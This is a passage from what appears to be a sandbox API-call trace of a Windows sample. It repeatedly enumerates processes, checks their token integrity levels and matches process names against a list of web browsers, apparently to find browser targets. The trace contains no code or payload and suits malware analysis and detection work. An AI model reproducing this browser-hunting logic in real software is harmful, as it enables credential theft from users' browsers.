[4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0476.339] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0476.339] CloseHandle (hObject=0x3bc) returned 1 [0476.339] CloseHandle (hObject=0x5a4) returned 1 [0476.339] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0476.339] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0476.339] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0476.339] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0476.339] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0476.339] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0476.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0476.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0476.339] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0476.339] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0476.339] GetLastError () returned 0x7a [0476.339] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0476.339] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0476.339] CloseHandle (hObject=0x3bc) returned 1 [0476.339] CloseHandle (hObject=0x5a4) returned 1 [0476.340] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0476.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0476.340] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375c60, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">l") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0476.340] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0476.340] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0476.340] GetLastError () returned 0x7a [0476.340] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0476.340] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0476.340] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0476.340] CloseHandle (hObject=0x3bc) returned 1 [0476.340] CloseHandle (hObject=0x5a4) returned 1 [0476.340] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0476.340] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0476.340] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0476.340] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0476.340] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0476.340] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0476.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0476.340] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0476.340] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0476.340] GetLastError () returned 0x7a [0476.340] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0476.340] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0476.340] CloseHandle (hObject=0x3bc) returned 1 [0476.340] CloseHandle (hObject=0x5a4) returned 1 [0476.340] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0476.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0476.341] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376420, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">m") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0476.341] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0476.341] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0476.341] GetLastError () returned 0x7a [0476.341] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0476.341] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0476.341] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0476.341] CloseHandle (hObject=0x3bc) returned 1 [0476.341] CloseHandle (hObject=0x5a4) returned 1 [0476.341] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0476.341] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0476.341] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0476.341] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0476.341] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0476.341] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0476.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0476.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0476.341] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0476.341] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0476.341] GetLastError () returned 0x7a [0476.341] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0476.341] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0476.341] CloseHandle (hObject=0x3bc) returned 1 [0476.341] CloseHandle (hObject=0x5a4) returned 1 [0476.341] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0476.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0476.341] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376a68, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">n") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0476.341] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0476.341] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0476.341] GetLastError () returned 0x7a [0476.341] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0476.342] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0476.342] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0476.342] CloseHandle (hObject=0x3bc) returned 1 [0476.342] CloseHandle (hObject=0x5a4) returned 1 [0476.342] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0476.342] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0476.342] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0476.342] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0476.342] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0476.342] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0476.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0476.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0476.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0476.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0476.342] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0476.342] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0476.342] GetLastError () returned 0x7a [0476.342] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0476.342] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0476.342] CloseHandle (hObject=0x3bc) returned 1 [0476.342] CloseHandle (hObject=0x5a4) returned 1 [0476.342] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0476.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0476.342] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376e10, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">o") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0476.342] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0476.342] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0476.342] GetLastError () returned 0x7a [0476.342] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0476.342] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0476.342] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0476.342] CloseHandle (hObject=0x3bc) returned 1 [0476.343] CloseHandle (hObject=0x5a4) returned 1 [0476.343] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0476.343] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0476.343] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0476.343] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0476.343] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0476.343] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0476.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0476.343] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0476.343] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0478.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa6a8) returned 0xc0000004 [0478.356] VirtualAlloc (lpAddress=0x0, dwSize=0xb6a8, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0478.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb6a8, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0478.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0478.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0478.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0478.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0478.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0478.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0478.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0478.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0478.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0478.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0478.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0478.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0478.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0478.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0478.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0478.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0478.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0478.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0478.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0478.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0478.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0478.377] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0478.377] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0478.377] GetLastError () returned 0x7a [0478.377] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0478.377] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0478.377] CloseHandle (hObject=0x3bc) returned 1 [0478.377] CloseHandle (hObject=0x5a4) returned 1 [0478.377] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0478.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0478.377] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x378028, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">p") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0478.377] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0478.377] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0478.377] GetLastError () returned 0x7a [0478.377] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0478.377] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0478.377] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0478.377] CloseHandle (hObject=0x3bc) returned 1 [0478.377] CloseHandle (hObject=0x5a4) returned 1 [0478.378] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0478.378] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0478.378] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0478.378] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0478.378] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0478.378] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0478.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0478.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0478.378] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0478.378] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0478.378] GetLastError () returned 0x7a [0478.378] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0478.378] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0478.378] CloseHandle (hObject=0x3bc) returned 1 [0478.378] CloseHandle (hObject=0x5a4) returned 1 [0478.378] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0478.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0478.378] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375c60, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">q") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0478.378] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0478.378] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0478.378] GetLastError () returned 0x7a [0478.378] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0478.378] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0478.378] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0478.378] CloseHandle (hObject=0x3bc) returned 1 [0478.378] CloseHandle (hObject=0x5a4) returned 1 [0478.378] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0478.378] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0478.378] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0478.378] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0478.378] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0478.378] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0478.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0478.378] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0478.378] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0478.378] GetLastError () returned 0x7a [0478.378] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0478.378] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0478.378] CloseHandle (hObject=0x3bc) returned 1 [0478.378] CloseHandle (hObject=0x5a4) returned 1 [0478.379] 